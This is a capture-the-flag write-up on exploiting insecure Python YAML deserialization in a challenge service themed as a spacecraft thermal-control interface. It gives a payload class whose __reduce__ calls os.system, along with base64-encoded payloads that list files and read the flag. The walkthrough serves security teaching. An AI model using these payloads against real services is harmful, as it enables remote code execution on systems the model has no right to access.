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The security of the alien spacecrafts did not prove very robust, and you have gained access to an interface allowing you to upload a new configuration to their ship's Thermal Control System. Can you take advantage of the situation without raising any suspicion?

Find the flag

In this challenge, we can nc to the instance machine:

└> nc 31087

[1] Create config
[2] Load config
[3] Exit

In here, we can "Create config" and "Load config".

Create config:

[1] Create config
[2] Load config
[3] Exit
> 1

- Creating new config -
Temperature units (F/C/K): F
Propulsion Components Target Temperature : 69
Solar Array Target Temperature : 96
Infrared Spectrometers Target Temperature : 420
Auto Calibration (ON/OFF) : ON  

Serialized config: ISFweXRob24vb2JqZWN0Ol9fbWFpbl9fLkNvbmZpZyB7SVJfc3BlY3Ryb21ldGVyX3RlbXA6ICc0MjAnLCBhdXRvX2NhbGlicmF0aW9uOiAnT04nLAogIHByb3B1bHNpb25fdGVtcDogJzY5Jywgc29sYXJfYXJyYXlfdGVtcDogJzk2JywgdW5pdHM6IEZ9Cg==
Uploading to ship...

[1] Create config
[2] Load config
[3] Exit

Based on my experience, the last 2 characters are =, which is a base64 encoded string.

Also, the output said: "Serialized config"

Let's try to base64 decode that:

└> echo 'ISFweXRob24vb2JqZWN0Ol9fbWFpbl9fLkNvbmZpZyB7SVJfc3BlY3Ryb21ldGVyX3RlbXA6ICc0MjAnLCBhdXRvX2NhbGlicmF0aW9uOiAnT04nLAogIHByb3B1bHNpb25fdGVtcDogJzY5Jywgc29sYXJfYXJyYXlfdGVtcDogJzk2JywgdW5pdHM6IEZ9Cg==' | base64 -d
!!python/object:__main__.Config {IR_spectrometer_temp: '420', auto_calibration: 'ON', propulsion_temp: '69', solar_array_temp: '96', units: F}

Again, based on my experience, the decoded string is a Python's YAML library's serialized data.

According to HackTricks, we can gain RCE (Remote Code Execution) on the instance machine!

With that said, let's copy and paste that payload, and generate a base64 encoded serialized YAML data:

import yaml
from yaml import UnsafeLoader, FullLoader, Loader
import os
import base64

class Payload(object):
    def __reduce__(self):
        return (os.system,('ls',))

deserialized_data = yaml.dump(Payload()) # serializing data
└> python3

When the YAML data is deserialized, the instance machine will try to run class Payload, and the magic method __reduce__ will be automatically invoked, which will then executing OS command.

Let's load that config!

[1] Create config
[2] Load config
[3] Exit
> 2

Serialized config to load: ISFweXRob24vb2JqZWN0L2FwcGx5OnBvc2l4LnN5c3RlbQotIGxzCg==
** Success **
Uploading to ship...

Boom! We can confirm it's vulnerable to Python's YAML insecure deserialization.

Let's read the flag!


return (os.system,('cat flag.txt',))
└> python3
[1] Create config
[2] Load config
[3] Exit
> 2

Serialized config to load: ISFweXRob24vb2JqZWN0L2FwcGx5OnBvc2l4LnN5c3RlbQotIGNhdCBmbGFnLnR4dAo=
** Success **
Uploading to ship...


What we've learned:

  1. Insecure Deserialization In Python's YAML Library